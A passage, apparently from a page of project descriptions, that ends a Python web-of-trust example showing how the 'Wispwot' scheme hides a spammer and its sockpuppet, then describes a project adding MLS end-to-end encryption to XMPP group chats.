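            "scores": w.scores("alice", now, window)}


if __name__ == "__main__":
    print(scenario())
```

In the constructed scenario the spammer's score for alice is -40 (bob, distance 1) plus 16 (carol, distance 2) = -24, so it is invisible even though carol endorsed it, and its sockpuppet scores 0 because a negatively scored identity gets no vote. Note the limitation of this simplification: trust from identities at the same or a greater distance is ignored, which keeps the computation a single pass over ranks but would need refinement in a real deployment.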

>> Read more about Wispwot

MLS for XMPP — Add Message Layer Security to XMPP

XMPP (Extensible Messaging and Presence Protocol) is an IETF-standardized (RFC 6120/6121) communication protocol designed for instant messaging and other near-real-time exchange of structured data between two or more network entities. MLS (Messaging Layer Security) is an emerging, IETF-standardized (RFC 9420) protocol for end-to-end encryption of messages and a central part of the IETF MIMI (More Instant Messaging Interoperability) effort to allow communication across messaging apps, for example in the context of the EU Digital Markets Act.

This project adds support for MLS encrypted messaging to XMPP group chats. This includes creating a prototype implementation, standardizing an XMPP Extension Protocol (XEP) and introducing support in two existing XMPP clients.

>> Read more about MLS for XMPP